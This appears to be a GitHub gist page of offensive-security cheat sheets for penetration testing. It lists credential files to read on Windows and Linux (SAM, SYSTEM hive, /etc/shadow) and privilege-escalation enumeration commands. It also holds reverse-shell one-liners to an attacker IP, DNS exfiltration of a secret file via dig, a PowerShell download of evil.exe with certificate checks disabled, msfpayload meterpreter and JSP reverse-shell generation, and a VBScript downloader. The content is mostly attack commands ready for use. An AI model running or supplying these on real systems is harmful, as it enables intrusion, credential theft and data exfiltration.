Skip to content

Instantly share code, notes, and snippets.

@waywardsun
waywardsun / windows_blind
Created September 20, 2016 22:43 — forked from sckalath/windows_blind
Windows Blind Files
%SYSTEMDRIVE%\boot.ini
%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
%WINDIR%\repair\sam
%WINDIR%\repair\system
@waywardsun
waywardsun / linux_blind
Created September 20, 2016 22:43 — forked from sckalath/linux_blind
Linux Blind Files
# Use these if you have a simple command shell through LFI or something similar.
/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
@waywardsun
waywardsun / windows_privesc
Created September 20, 2016 22:44 — forked from sckalath/windows_privesc
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
@waywardsun
waywardsun / linux_privesc
Created September 20, 2016 22:44 — forked from sckalath/linux_privesc
Linux Privilege Escalation Techniques
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs
#1
nc <attacker_ip> <port> -e /bin/bash
#2
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
#3
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
#4
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
#5
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
@waywardsun
waywardsun / dns_egress_nix
Created September 20, 2016 22:44 — forked from sckalath/dns_egress_nix
DNS transfer on Linux
On victim:
1. Hex encode the file to be transferred:
xxd -p secret file.hex
2. Read in each line and do a DNS lookup:
for b in 'cat file.hex'; do dig $b.shell.evilexample.com;done
On attacker:
1. Capture DNS exfil packets
tcpdump -w /tmp/dns -s0 port 53 and host system.example.com
2. Cut the exfilled hex from the DNS packet
@waywardsun
waywardsun / powershell_snippets
Created September 20, 2016 22:45 — forked from sckalath/powershell_snippets
Powershell Snippets
# Transfer file from attacking box to victim
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://attackerip/evil.exe"""; $destination="""C:\destination_file.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"
@waywardsun
waywardsun / msfpayload_commands
Created September 20, 2016 22:45 — forked from sckalath/msfpayload_commands
msfpayload commands
# generate windows meterpreter on port 4444 that outputs an asp file
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.16.31 LPORT=4444 R | msfencode -o mwcb.asp -e generic/none -t asp
#generate jsp reverse tcp over port 443
msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.16.31 LPORT=443 R > jsprev.jsp
#would likely need to add this jsp to a WAR file for deployment
jar -cvf jsprev.war * #from within the main war directory that also contains the WEB-INF dir
#simple javascript reverse shell over port 443
@waywardsun
waywardsun / metasploit_snippets
Created September 20, 2016 22:45 — forked from sckalath/metasploit_snippets
Metasploit snippets
#autorun script (session.rc)
migrate -k -n explorer.exe
multi_console_command -cl "getsystem","getuid"
get_env
checkvm
#setting msf to use autorunscript above
set autorunscript multiscript.rb -rc /home/ryan/session.rc
@waywardsun
waywardsun / wget_vbs
Created September 20, 2016 22:46 — forked from sckalath/wget_vbs
wget vbscript
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs